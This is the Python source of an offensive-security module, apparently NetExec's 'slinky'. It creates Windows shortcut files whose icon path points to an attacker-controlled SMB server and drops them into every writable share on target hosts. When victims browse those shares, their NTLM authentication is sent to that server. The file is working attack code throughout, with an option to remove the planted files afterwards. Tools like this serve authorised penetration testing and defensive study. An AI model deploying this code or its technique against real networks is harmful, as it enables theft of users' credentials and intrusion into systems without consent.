82 lines
2.8 KiB
Python
82 lines
2.8 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import pylnk3
|
|
import ntpath
|
|
from sys import exit
|
|
|
|
|
|
class NXCModule:
|
|
"""
|
|
Original idea and PoC by Justin Angel (@4rch4ngel86)
|
|
Module by @byt3bl33d3r
|
|
"""
|
|
|
|
name = "slinky"
|
|
description = "Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions"
|
|
supported_protocols = ["smb"]
|
|
opsec_safe = False
|
|
multiple_hosts = True
|
|
|
|
def __init__(self, context=None, module_options=None):
|
|
self.context = context
|
|
self.module_options = module_options
|
|
self.server = None
|
|
self.file_path = None
|
|
self.lnk_path = None
|
|
self.lnk_name = None
|
|
self.cleanup = None
|
|
|
|
def options(self, context, module_options):
|
|
"""
|
|
SERVER IP of the SMB server
|
|
NAME LNK file name
|
|
CLEANUP Cleanup (choices: True or False)
|
|
"""
|
|
|
|
self.cleanup = False
|
|
|
|
if "CLEANUP" in module_options:
|
|
self.cleanup = bool(module_options["CLEANUP"])
|
|
|
|
if "NAME" not in module_options:
|
|
context.log.fail("NAME option is required!")
|
|
exit(1)
|
|
|
|
if not self.cleanup and "SERVER" not in module_options:
|
|
context.log.fail("SERVER option is required!")
|
|
exit(1)
|
|
|
|
self.lnk_name = module_options["NAME"]
|
|
self.lnk_path = f"/tmp/{self.lnk_name}.lnk"
|
|
self.file_path = ntpath.join("\\", f"{self.lnk_name}.lnk")
|
|
|
|
if not self.cleanup:
|
|
self.server = module_options["SERVER"]
|
|
link = pylnk3.create(self.lnk_path)
|
|
link.icon = f"\\\\{self.server}\\icons\\icon.ico"
|
|
link.save()
|
|
|
|
def on_login(self, context, connection):
|
|
shares = connection.shares()
|
|
for share in shares:
|
|
if "WRITE" in share["access"] and share["name"] not in [
|
|
"C$",
|
|
"ADMIN$",
|
|
"NETLOGON",
|
|
]:
|
|
context.log.success(f"Found writable share: {share['name']}")
|
|
if not self.cleanup:
|
|
with open(self.lnk_path, "rb") as lnk:
|
|
try:
|
|
connection.conn.putFile(share["name"], self.file_path, lnk.read)
|
|
context.log.success(f"Created LNK file on the {share['name']} share")
|
|
except Exception as e:
|
|
context.log.fail(f"Error writing LNK file to share {share['name']}: {e}")
|
|
else:
|
|
try:
|
|
connection.conn.deleteFile(share["name"], self.file_path)
|
|
context.log.success(f"Deleted LNK file on the {share['name']} share")
|
|
except Exception as e:
|
|
context.log.fail(f"Error deleting LNK file on share {share['name']}: {e}")
|